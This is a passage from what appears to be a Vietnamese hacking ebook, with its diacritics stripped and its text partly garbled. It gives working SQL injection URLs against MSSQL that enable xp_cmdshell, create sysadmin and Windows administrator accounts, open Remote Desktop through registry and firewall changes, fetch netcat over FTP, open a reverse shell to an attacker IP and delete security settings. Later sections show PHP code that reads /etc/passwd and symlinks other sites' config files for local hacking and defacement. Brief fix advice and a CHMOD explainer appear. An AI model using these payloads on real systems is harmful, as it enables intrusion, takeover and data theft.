Nhng m v c "SA" trong tay nn ci ny ta vn c thenable c bng cch dngsp_configure

www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'show advanced options', 1--sp_password

===> cu lnh ny l ta bt show advanced optionsth mi c thenable xp_cmdshellc.(v xp_cmdshellnm trong ) ... Nu n khng bo li g m trli trang:


Th kt qu l thnh cng. Tip tc khai thc:

http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password

===> cu lnh ny ta reconfigureli n bt u bt show advanced options... Nu nkhng bo li g m trli trang:


Th kt qu l thnh cng. Tip tc khai thc:

www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'xp_cmdshell', 1--sp_password

===> bt u enable xp_cmdshell... Nu n khng bo li g m trli trang:


Th kt qu l thnh cng. Tip tc khai thc vi cu lnh reconfigure mt ln na:

http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password

===> cu lnh ny ta reconfigureli n bt u bt xp_cmdshell

Sau khi enable xp_cmdshell ta thipconfig /all xem sao:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell'ipconfig /all'--sp_password

Page 27


28/69


Kt qu tr v:

Lu :mc d enable xp_cmdshellnhng cha chc lm cg trn server, ti vMSSQL Server 2005 khng cho chy cc lnh nh "net user hieupc 123456 /add" , ngay c

active user Guest"net user Guest /active" cn khng hiu qu

Add thm user vo MSSQL Server:

By givn Victim l


Add thm user vo SQL Server lm g ? L ta c thlogin vo MSSQL Server ca hbngQuery Analyzer trong Microsoft SQL Server c thvit Query va nhanh v ddng hn(hoc nm vng cng cc tt).Ngoi ra ta c th s dng: RazorSQL connect.

utin l to ra user:

www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addlogin 'hieupc', '123456'--sp_password

===> Ta va to thm 1 user trong SQL Server ca n vi username l hieupc v password l123456. Nu n khng bo li g m trli trang:


Th kt qu l thnh cng. Khi c user ri th ta phi add n ln quyn qun trcao nht

(ngang = SA)

www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addsrvrolemember 'hieupc', 'sysadmin'--sp_password

Nu n khng bo li g m trli trang:


Th kt qu l thnh cng.

Page 28


29/69


By gi ta dng Query Analyzer hoc RazorSql connect v login vo th xem sao (nhng chpdng cho server MSSQL cho remote txa nh. V mt s server cm remote MSSQL t xa.)

Kt qu:

V ti y ri, cc bn lm c rt nhiu iu hay lm y.

Chim quyn Admin v Remote Desktop nh sau:S dng cu lnh CMD sau add thm user cho window vi username = hieupc v password =123456:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net user hieupc 123456 /add'--sp_password

Kt qu nh sau l thnh cng:

add user hieupc vo group administrators, ta lm nh sau:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup administrators hieupc /add'--

sp_password


Page 29


30/69


By gi ta add user hieupc vo group Remote Desktop Usersn c quyn Remote Desktop:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" hieupc

/add'--sp_password


Vy l by gibn c thm 1 ti khon admin vi password l 123456 vi quyn hthng vc thremote desktop.Chn remote desktopnh sau :(Start->programs->accessories->communications->Remote Desktop)

Hoc vo run g "mstsc"

Gichcn in IP hoc domainname (www.hieupc.gov.vn)nh user v pass vo login voserver v lm nhng g mnh mun.

Kt qu l remote desktop c vo server:

Upload Backdoor ln Server nh th no qua quyn SA:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.Your_Domain.com>ftp&echo user

Your_User Your_Pass>>ftp&echo get Your_File>>ftp&echo quit>>ftp'--sp_password

Page 30


31/69


32/69


Sau y l cch gii quyt:Site demo vn l:


Nh cc bn bit l Registryhay cn gi l Regeditrt quan trng trong hthng cawindow , khi c system_user = 'SA'trong tay th bn c thtng tc vo registryca my ch.V vytaphi can thip vo Regedit Enable mt vi th:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite

HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections',REG_DWORD,0--sp_password

===> ghi kha registry cho fDenyTSConnectionsvi gi tr= 0

Tip tc cu lnh:


HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal

Server','AllowTSConnections',REG_DWORD,1--sp_password

===> ghi kha registry cho AllowTSConnectionsvi gi tr= 1

Sau :

www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,@@servername)--sp_password

===> ly tn server cn khi ng li.

V s dng cu lnh sau restart li my 'shutdown -m \\tn_server r t 5'

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'shutdown -m \\tn_server r t 5'--sp_password

===> restart my no.

Page 32


33/69

Mt s iu cn ch :


Delete 1 kha registry nh sau:

www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'rootkey', 'key'--sp_password

===> cc bn ch 'rootkey' v 'key' l ng dn n kha registry ...

V dhieupc mun xa kha registry TestValue 'HKEY_LOCAL_MACHINE\SOFTWARE\Test'th sl:

www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Test\TestValue'--sp_password

c gi tr1 kha registry nh sau:

V dbn mun c kha registry fDenyTSConnectionsHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server xem n c

gi tr= bao nhiu th bn u tin phi query:

www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),

noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread

'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'--

sp_password

===> to ra 1 table lu trgi trregistry ca kha

Sau bn phi select dliu trong ra xem:

www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc


===> %2b= du +

Nu n hin li:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'fDenyTSConnections/0'to a column of data type int.===> c ngha l kha fDenyTSConnectionsc gi tr= 0

Ghi thm v Sa gi trca kha registry nh sau:

V dHieupc ssa gi trca fDenyTSConnectionsHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server thnh 1


HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal

Server','fDenyTSConnections',REG_DWORD,1--sp_password Page 33


34/69


Mtvi iu cn lu vRemote Desktop:

Khi m c SA v bn add thm thnh cng ti khon Admin , nhng khi bn connect voRemote Desktop ca Server th li khng c. Vy phi lm g tip theo y?

Lc ny ta phi enable ci Terminal Service bng cch:

Sc config TermService start= auto

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'Sc config TermService start= auto'--sp_password

Enable xong th ta phi start TermService:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net start TermService'--sp_password

M Port trong Firewallcho Remote Desktop:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall add portopening TCP

3389 Remote Desktop'--sp_password

By gi ta th connect Remote Desktop vo Server th xem sao.

Ngoi rabn cn lm thm vi cu lnh sau nu vn khng connectc vo Remote Desktop:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remoteadmin

enable'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remotedesktop

enable'--sp_password

Ch thm:

Thng thng l 1 Server khng cbt Firewall (nu c thng l firewall phn cng), nhngnu trong trng hp Server bt firewall, v chn 1 ng dng connect ca bn (nh Remote

Desktop chng hn) th sao? (v dnh chn netcat) th bn hy tham kho cch sau:

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set opmode enable disable'--

sp_password

Page 34


35/69


Server c enable nhng IP MSSQL Server khng trng vi ip Server cha web, ta lm nhsau:

Bn cn tm ra IP chnh xc ca MSSQL Server

www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))

insert into hieupc exec master..xp_cmdshell 'ipconfig'--sp_password

===> to ra 1 bng lu trthng tin ca lnh ipconfig

Sau

www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=8))--sp_password

Kt qu:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'IP Address. . . . . . . .

. . . . : xxx.xxx.x.xxx'to a column of data type int.

==> xxx.xxx.x.xxxchnh l ip ca MSSQL Server.Vy l bn c IP ca MSSQL , nhng nu n l IP mng LAN th sao ?. Th bn phi dngn netcat, bn phi up netcatln server v kt ni tserver vmy ca bn , u tin bn phiupload file netcatln 1 host ftp ca mnh: (ci ny c hng dn bi trn, xem chi tit trn nh)

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.your-host.com>>ftp'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo user your-ftp-username your-ftp-pass>>ftp'--

sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo get nc.exe>>ftp'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo quit>>ftp'--sp_passwordwww.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password

By gibn copy file netcat (nc.exe) vo C:\ ca mnh, vo cmd v g lnh cd\ di chuynti C:\sau g nc -l -p 1787 -vv

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'nc.exe-e cmd.exe -d your-ip1787'--sp_password

hoc

www.hieupc.gov.vn/hieupc.asp?id=1;select%20*%20from%20openrowset('sqloledb','server=BACKUP;uid=BUILTIN\Administrators;pwd=','set%20fmtonly%20off%20select%201%20exec%20master..xp_cmdshell%20"nc.exe-e

cmd.exe -d 58.187.32.401787"')--sp_password

58.187.32.40 hocyour ip : l a ch IP ca bn, xem a ch IP ca bn bng cch vo: ip2location.com

Lu :Nu connect thnh cng vo NCth bn hu nh remote c vo Server v c th lmnhngg bn thch.

Page 35


36/69


Nu Server change port Remote Desktop th sao:

www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),

noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread

'HKEY_LOCAL_MACHINE','System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

Tcp\','PortNumber'--sp_password

Query ly kt qu no

www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc


Kt qu tr li:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'PortNumber/xxxx'

to a column of data type int.

===> nu xxxx khc 3389 th xxxx chnh l cng Remote Desktop mi m Server change (v

3389 l cng mc nh ca Remote Desktop)Vy khi bn connect ti server bn phi thm xxx vo sau IP ca server.

Nu gp user khng phi l SA th sao:

Ti sao li phi a Guest vo DataBase Owner caDataBase Master?Bv DB Owner ca Db Master mi c quyn thc hin lnh xp_regwrite,xp_regdeletevaluev xp_cmdshell.

Ti sao Guest li sdng 2 lnh xp_regwrite,xp_regdeletevalue vxp_cmdshellBi v :

xp_regwritedng thc hin lnh ghi ln Registry ca Windowsxp_regdeletevaluedng xa dliu trong Registry ca Windowsxp_cmdshelldng gi lnh ln Windows dng nng quyn , chim quyn , ci backdoor..... s

Cn y l lnh a Guest vo Db Owner ca Db Master:

http://www.victim.com/index.asp?id=1;exec sp_executesql N'create view dbo.test as select * frommaster.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' execsp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec sp_executesql N'dropview dbo.test'--sp_password

Nu chy link trn m khng bo li v c trvtrang :

http://www.victim.com/index.asp?id=1

tc l bn thc hin thnh cng vic a Guest vo Db Owner ca Db Master nhng chochc n mnh vn kim tra li mt ln na bng cch sau :

http://www.victim.com/index.asp?id=1%20%20and%201=convert(int,(select%20top%201%20name%20from%20master..sysusers%20where%20roles=0x01%20and%20name%20not%20in('dbo')))--sp_password

Vy l xong gith thoi mi chy xp_regwritevi cxp_cmdshell

Page 36


37/69


C thchy xp_regwrite ,xp_regdeletevalue vixp_cmdshellri th lm g?Gilogin vo Database vi user BUILTIN\ADMINISTRATOR vi password = "xx":

http://www.victim.com/index.asp?id=1;exec%20sp_executesql%20N'create%20view%20dbo.test%20as%20select%20*%20from%20master.dbo.sysxlogins'%20exec%20sp_msdropretry%20'xx%20update%20sysusers%20set%20sid=0x01%20where%20name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%20update%20dbo.test%20set%20xstatus=18%20where%20name=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_executesql%20N'drop%20view%20dbo.test'--sp_password

Vy l ta c mt user nm vng trong DBca Server ... Sau ny mi mnh lnh phi thngqua user nyGimnh dng xp_regwriteEnable ci OpenRowset bSysAdmin kia Disable.

http://www.victim.com/index.asp?id=1;exec master..xp_regwriteHKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--sp_password

http://www.victim.com/index.asp?id=1;exec master..xp_regwriteHKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--sp_password

my chin m nh:1 : Enable

0 : Disable

Chy xong m n trvtrang chl thnh cng khi checkGith xi xp_regdeletevaluehy chc nng ghi log v lc dliu ca WINDOWS

http://www.victim.com/index.asp?id=1;exec master..xp_regdeletevalue'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'--sp_password

Gith cc bn khi lo bghi log, chnh v thmnh bci sp_password i cng c, nhngbn li cng chng sao.Gin lc bt ci xp_cmdshellln. Cc bn lu nha trn l cho php chy xp_cmdshellcn y l bt xp_cmdshellv allow updates.

http://www.victim.com/index.asp?id=1;select * from openrowset('sqloledb','server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedprocxp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ' '1'' reconfigure with override')--sp_passwordn y th ta c na ng ri, khai thc tip bng cch trn c trnh by.

Page 37


38/69


3. Nhng iu cn bit v Localhack:

Hieupc c bit hin nay hack local chc ai cng bit v cch lm th kh l n gin , ngayc nhng th thut ch khai thc nh th no cng rt nhiu. Hm nay Hieupc ch a vo ebookny vi bi vit di y cng l ch tham kho v chia s kinh nghim ca Hieupc tronghack local v vy khi bn c c th gp kin ring ca mnh nu c g cha ng hoc cnthiu. Cm n nhiu.

Local hack v cch phng trnh(Tc gi:Phm c Hi):

Bi ny vit vi mc ch cc qun tr v cc bn lm bo mt hiu mt cch r hn v cchtn local hack. Cch ny tuy rng ph bin lu nhng ti ngh rng khng ch Vit Nam mrt nhiu server nc ngoi vn b li ny, m i khi c bug mi l c th dng li c. Ticng tin rng rt nhiu bn bit tn cng local nhng khng bit fix li ny nh th no ?

Local hack l g:

Hiu mt cch nm na l tn cng cc b. Cc b y c ngha l trn cng mt my ch

(server). Tn cng ny c thc hin nh th no ?

V d ta cn tn cng site mc www.site1.com, nhng sau khi phn tchtnh hnh th thy rngvic tn cng trc tip site ny l rt kh. V cng qua kho st ta bit c rng trn server nyc rt nhiu site khc. tng : tn cng mt site khc cng server sau ly site ny lm bnp tn cng site mc tiu.

C nhng loi hack local no ? Ti tm thi chia lm 3 loi : Unix local, windows local, FTPlocal. C l rt nhiu bn ch bit n local hack trn Unix m cha bit n 2 loi sau . UnixLocal c ngha l my ch l Unix, tng t i vi windows local, cn FTP local c ngha llocal qua FTP.

Phn chung nht ca cc loi trn l bc 1, bc tm cc site cng server. Ci ny c thutng chung l : Reverse IP. Ta c th dng tool sau xc nh cc site cng server :

http://www.domaintools.com/reverse-ip/ --> ci ny mi thu ph ri

http://www.ip-adress.com/reverse_ip/ci ny Free v xi cng good lm.

http://www.seologs.com/ip-domains.html -> ci ny c li th l lu c tn min Vit Nam,nhng s lng t hn site trn

Sau khi lm xong bc trn, n bc tm site b li dng lm bn p tn cng. Bc ny th cc loi c s phn ha. Ti s trnh by ring tng phn.

Unix local:

C l by gi ch ph bin site php-mysql trn Unix, nn ti tp chung vo ci ny. Cch tm bugc tin hnh theo t duy nh sau :

- Nu site s sng mt loi m ngun c xc nh, v d dng m ngun m, th u tinl vo cc site thng bo bug kim tra xem bn code ang dng c dnh bug no khng. Cth vo http://milw0rm.com/ hay http://www.securityfocus.com/ ... tm bug. Page 38
http://www.guru.net.vn/PermaLink,guid,67aabdc3-59b9-4bd0-bf80-c2770a003a9c.aspxhttp://www.guru.net.vn/PermaLink,guid,67aabdc3-59b9-4bd0-bf80-c2770a003a9c.aspxhttp://www.guru.net.vn/PermaLink,guid,67aabdc3-59b9-4bd0-bf80-c2770a003a9c.aspx


39/69


- Nu bc trn khng thnh cng hoc code do h t pht trin th cch duy nht l phi tngi m xem. Lc ny da vo kinh nghim v kh nng ca ngi hack l chnh. Cc li hayc s dng v kh d pht hin : SQL injection, PHP file include, li ci mc nh cc ngdng nh cc b editor, li khng chng thc phn upload file, upload file khng filter, hoc cfilter + apache unknow extension,... rt nhiu li c th khai thc c. Ti s khng i vo chitit cc li ny s dng v khai thcnh th no.

Sau khi tm ra li, mc tiu l phi upload c mt con shell ln c th tin hnh tip bcsau. Vic upload c shell hay khng ph thuc rt nhiu vo vic admin site CHMOD ctt khng. Ti gi s l upload c shell ri. n y ta bt u th local sang site mc tiu.Nu Safe mode OFF v local d dng th khng c g ng ni, site mc tiu c th xm nhp.Nu Safe mode ON v local gp kh khn, lc ny cn phi bit v cc bug safe mode by pass.Cc li ny ty thuc vo phin bn ca PHP v ph thuc vo cc hm c th s dng c bcm hay khng. Nu khng dng PHP safe modeby pass ta c th dng LOAD DATA LOCALINFINE, v ci ny th ch Yn c bi vit ri.

Nu tt c cc cch trn khng c, ta xoay sang xem c kh nng get root - chim quyn kimsot server hay khng, ci ny ty thuc vo kernel ca h iu hnh v ty thuc vo phn mn

ci trn my ch c dnh bug overflow hay khng ? ... Ni tm li l khi c shell ri mi ngic mt cch ty thuc kh nng.

-->Cch fix ?

khng b dnh cc li trn th phi update phn mm v config ng (ti s ni chi tit bikhc).

- Bt safe mode ON

- Upgrade PHP ln version mi nht

- Trong php.ini Cm cc hm nhy cm + cc hm c th safe modebypass (i hi admin phicp nht thng tin lin lc)

- i vi virtual host th tham s open_basedir l rt quan trng, cn phi t tham s ny ngvi th mc web ca tng site

- CHMOD k cn thn (CHMOD nh th no th phi c)

- Cc form upload cnphi lc file...

- Trong file my.conf thm dng set-variable=local-infile=0 trnh li LOAD DATA LOCALINFINE

Windows local:

Cch tm site li v c bn l ging phn trn, ch khc c tnh ngn ng lp trnh, cn phixem xt k hn kha cnh ny.

c th local c ccc kh nng sau : phn quyn b khng tt (thng l dng chunggroup, group phn quyn khng cn thn),server cha cm command execute. Tt c cc shellchy trn windows u c mt c tnh l s dng FSO (File System Object) - nu ci ny lm

cn thn m move cmd.exe i th khng c cch g chy c cmd. Page 39


40/69


y l cn cha ni n chng trnh dit virus rt nhy cm vi FSO, nn rt d b pht hin.

-->Cch khc phc ?

Phn quyn tt : tt nht l nn dng windows 2003 server, mi mt site chy mt pool l ttnht, nhng nh th tn ti nguyn hn. Account chy web ca mi site l ring bit v accountchyASP.NETkhc account chy asp, php,... Vic set permission l cu k quan trng, lm

tt vic ny, cn phi c thm ti liu v lm tt cc security check list ca Microsoft. Lu lkhng dng Default pool chy. Thng l cc server ring rt hay gp li ny v adminnhng server ny ch cn ci cho chy c l xong nhng ngc li server ring thng chchy 1 vi site. Ci nguy him chnh l ch ny, nu mserver ring b tn cng kh nng mtquyn kim sot v mt mt d liu nhiu l rt cao.

FTP local:

Ci ny nghe c v l nhng cch khai thc li cc k n gin, ti ly chnh site ca ti lmVD.

Trn hnh bn nhn thy ri , ci FTP trn l ti login vo acc FTP ca ti, nhng ti c thvo tt c cc FTP khc cng server.

Vy li u ? Li c th do 2 kh nng :

- Tham s Fix Home dir (khngnh r) khng c set

- Tt c cc user FTP chung group v group ny c quyn i vi tt c cc th mc ca cc accthnh phn.

--> Cch fix ? nh ti trnh by nh trn th bn bit fix ri ch .

Bi ny ti vit mang tnh cht tng hp, 2 phn trn ti khng ly hnh minh ha v n kh phbin v c nhiu bi minh ha ri.

Page 40
http://www.guru.net.vn/ct.ashx?id=67aabdc3-59b9-4bd0-bf80-c2770a003a9c&url=http%3a%2f%2fASP.NEThttp://www.guru.net.vn/ct.ashx?id=67aabdc3-59b9-4bd0-bf80-c2770a003a9c&url=http%3a%2f%2fASP.NEThttp://www.guru.net.vn/ct.ashx?id=67aabdc3-59b9-4bd0-bf80-c2770a003a9c&url=http%3a%2f%2fASP.NEThttp://www.guru.net.vn/ct.ashx?id=67aabdc3-59b9-4bd0-bf80-c2770a003a9c&url=http%3a%2f%2fASP.NET


41/69


Kinh nghim ca Hieupc v LocalHack:

- Hin nay khi hack local a s cc server u bt tnh nng safe mode ONvDisablefunctions:phpinfo, lynx, proc_open, symlink, readlink, wget, system, exec, shell_exec, passthru, pcntl_exec, proc_close,proc_get_status, prus, proc_nice, proc_terminate, popen, pclose, virtual, openlog, escapeshellcmd,escapeshellarg,

show_source, dl, chgrp, chownv vy ta khng th lm c g. V d v 1 server nh vy hnhdi:

y l trng hp Safe Mode OFF:

- PHP version 5.2.10 nh trong hnh hin nay vn rt kh hack local, nhng i vi nhng phinbn thp hn th ta vn c th local bng: Symlink, dng readfile("th mcweb/user/home/public_html/link file"); .Ngoi ra ta cng c th dng cat filequa Mysql hocMSSQL nu bn c 1 user Mysql hoc MSSQL trong tay, tt nhin l cng Server nh.

V d:readfile("/etc/passwd"); trong shell R57

Page 41


42/69


Cat file qua mysql:

$port = "3306";$user = "root";$pass = "";$database = "test";$file = "/etc/passwd";$db = @mysql_connect('localhost:'.$port,$user,$pass);

$sql = "DROP TABLE IF EXISTS temp_vniss_test;";@mysql_query($sql);$sql = "CREATE TABLE `temp_vniss_test` ( `file` LONGBLOB NOT NULL );";@mysql_query($sql);$sql = "LOAD DATA INFILE \"".$file."\" INTO TABLE temp_vniss_test;";@mysql_query($sql);$sql = "SELECT * FROM temp_vniss_test;";$r = @mysql_query($sql);while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }$sql = "DROP TABLE IF EXISTS temp_vniss_test;";@mysql_query($sql);

@mysql_close($db);

Tng t vi mssql:

$port = "1433";$user = "root";$pass = "";$database = "test";$file = "/etc/passwd";

$db = @mssql_connect('localhost,'.$port,$user,$pass);@mssql_query("drop table temp_vniss_test",$db);@mssql_query("create table temp_vniss_test ( string VARCHAR (500) NULL)",$db);@mssql_query("insert into temp_vniss_test EXEC master.dbo.xp_cmdshell '".$file."'",$db);$res = mssql_query("select * from temp_vniss_test",$db);while(($row=@mssql_fetch_row($res))){echo $row[0]."\r\n";}@mssql_query("drop table temp_vniss_test",$db);@mssql_close($db);

- C mt cch bn c th xi shell script trn server nu PHP version l : 5.2.10hoc mi hn,nu bn c mt host trn server v c user + pass FTP th lc ny mi chuyn nh n ginhn v bn ch cn upload con shell ln v bt u khai thc bng cch Symlink. Symlink bngcch sau:

V d th mc cha web c dng l:

/home/hieu/domains/hieu.net/public_html/Th mc cha web ca site mnh cn symlink l:

/home/hieupc/domains/hieupc.com/public_html/

Page 42


43/69


Gi th khai thc ly file config.php v host ca mnh nh:

ln -s /home/hieupc/domains/hieupc.com/public_html/config.php 12345.txt

File ta symlink v l config.php, link vi 12345.txt trn host ca mnh.

Gi ta xem ci no:

http://hieupc.com/12345.txt

Kt qu hin ra l file config.php bn site m mnh ang attack:

Thng qua cch ny ta c th lm c kh nhiu chuyn nh ly cpass ca Mysql t fileconfig ca sitev t y ta c th khai thc tip chim quyn admin ca site . Cch nyc gi l local hack thng.qua Mysql.

-Nu website b li LFI hoc RFI th ta c th dng li ny a shell vo v khai thc nhbnh thng. Tm hiu thm v dng hack ny vnbrain.net hoc hcegroup.net

- Cc bn cng c th get rootqua nhng kernel linux b li m server cha upgrade . Ci ny lnmilw0rm.com cp nht thm.

-Nu bn c mt mc tiu mun hack trang web no m mnh li khng c host trn cngServer th ta phi Reverse IP xem nhng site cng Server v t ta s hack theo dngleo thang, c gng search li ca nhng site cng server t ta hack bng nhiu cch nhSQL Injection, File Inclusion Attack,RFI, XSS t vo c admin panel ca site ri thta c gng lm sao Upload c shell ln. Sau khi c shell trn cng server vi site m tamun hack th tabt u vn dng kh nng local hack ca mnh v attack + deface nu mun.

Ta cng c th p dng trng hp ny hack shop bng localhack.Nhng nhng shop ln tha s xi Server ring nn vic mun hack c vo cng l mt vn .

-Nu gp pass ca Admin l MD5 m bn lm bing crack th ta c th convert password123456 sang dng MD5 v sau chp vo pass MD5 kia (tc nhin l lc ny bn voc Mysql ca site th mi c th lm c vic ny). Ta cng c th change email addressv sau dng tnh ny forgot password (ci ny hieupc thng dng cho VBB hay IBF resetpassword ca admin). Sau ng nhp th xem sao.

Page 43


44/69


Bit thm v CHMOD:

Mt trong cc li m cc admin hay mc phi l CHMOD sai, do CHMOD sai nn kh nng site b tn cng l cao hn rt nhiu so vi cc site khc CHMOD ng, c bit l cng serverkhi b hack local. Tt nhin l ch vi li ny th khng th tn cng trc tip v y khng phil li c th tn cng c. Li ny d dng b khai thc khi th mc t quyn ghi v chy ngthi cho mt th mc, thng l cc th mc cho php upload. Nn hacker d dng chy shell

th mc ny. Mt trng hp khc l khi hack local, CHMOD 777 l 1 thm ha, v nh vy l b kim sot ton b th mc . V ti dm chc dng tay hacker no khi hack local m nhnthy ci mu xanh lt (mu thng thng cho cc th mc l )ca th mc 777 th mng ra mtv ngh admin ny "g" gh.

V sao ti vit bi ny ? V nhiu admin,coder khng bit CHMOD l g ? hoc ch hiu s qua.H ch quan tm n cho website chy c, chm ht. Nhiu ngi cn hiu rt ngy th rngquyn ghi ng ngha vi 777. Hon ton sai!!! Vy CHMOD l g ?

CHMOD - l phm tr lin quan n cc files v th mc, c chc nng ch ra cho server bit,ai c th lm g i vi file hay th mc no . Ch yu CHMOD a ra cc lnh nh quyn

c c, vit vo file (hay th mc), quyn thc hin mt cng vic nht nh. V phn ln cc server lm vic trn c s h thng UNIX, nn chng ta s nghin cu v cchCHMOD chnh cho cc servers ny.Trn cc h thng UNIX, ngi s dng c chia ra lm 3 nhm:"user" (ch nhn trc tip cacc files), "group" (thnh vin ca nhm m ngi ch nhn file c tham gia) v "world" (tt cnhng trng hp khc). Khi bn kt ni vi server, n s xc nh xem bn thuc v nhm no.V d bn kt ni vi server bng FTP, khai bo tn truy cp nh mt thnh vin, chnh server squy bn vo nhm "user". Cn nhng thnh vin khc truy cp bng FTP thuc v nhm"group". Khi ai n site ca bn bng trnh duyt web, s c quy vo nhm "world". Sau khi xc nh nhm,ngi s dng s c gn quyn hn nht nh i vi file hoc thmc no . C th l ngi s dng s c c, ghi hay to mi (hoc xa) file. xem thmc no th n phi ng h cho vic xem ny. c xem ni dung th mc, th cc fileshay th mc con trong cng phi c ch "Cho php c". Cn to file hay th mc minm trong th mc ny li i hi phi c quyn ghi. Tm li, thc hin mt trong nhng victrn, cn phi t vo th mc ch "quyn c" v "quyn thc hin".

By gi chng ta s thc hnh...Nh trn nu, c tt c 3 nhm ngi s dng v 3 "quyn hn" i vi files hay th mc. xc nh quyn hn cho cc nhm nht nh, thng nht s dng cc k hiu bng con s nhsau:4 = read (quyn c c)2 = write (quyn c ghi)1 = execute (quyn c thc hin)Bng php cng n gin cc con s ny c th hin th c c mt "t hp" quyn hn khcnhau. V d, 3 (2+1) - quyn ghi v quyn thc hin i vi file (hay th mc); 5 (4+1) - quync v quyn thc hin; 6 (4+2) - quyn c v quyn ghi; 7 (4+2+1) - quyn c, ghi v thchin. Tm li c tt c 7 phng n sau:7 = read, write & execute6 = read & write5 = read & execute4 = read3 = write & execute2 = write1 = execute

Page 44


45/69


K hiu lnh CHMOD thng c 3 con s: con s uth hin quyn hn gn cho ngi sdng thuc nhm "user" (Tc l i vi bn). Con s th hai ch ra quyn hn ca ngi s dngthuc nhm "group" v con s th ba - dnh cho nhm "world".Trong phn ln cc chng trnh FTP hin i u ng h CHMOD theo kiu nu trn (V d,cng c truy cp bng FTP mnh nht hin nay l WS_FTP)Th nhng cng khng tha nu nh ta bit thm v cc lnh ca h thng UNIX. lnh "chmod"trong UNIX c 2 ch : tuyt i (Bng cc con s) v bng cc k hiu ch.

Khi sdng ch tuyt i (bng cc con s), thng nht dng t hp 3 con s c nu trn th hin quyn hn.Trong trng hp s dng k hiu ch, chng ta s bt gp nhng k hiu sau: "r" - quyn c c"w" - quyn c ghi"x" - quyn c thc hinNgoi ra cn c:"u" - i vi user"g" - i vi group"o" - i vi other (world)"a" - i vi all (tt c)

V d: 755 = chmod u=rwx,go=rx filename; 644 = chmod u=rw,go=r filename; 600 = chmodu=rw,go= filename; 444 = chmod a=r filename.

Di y l bng cc t hp thng gp phn ln cc hosting:

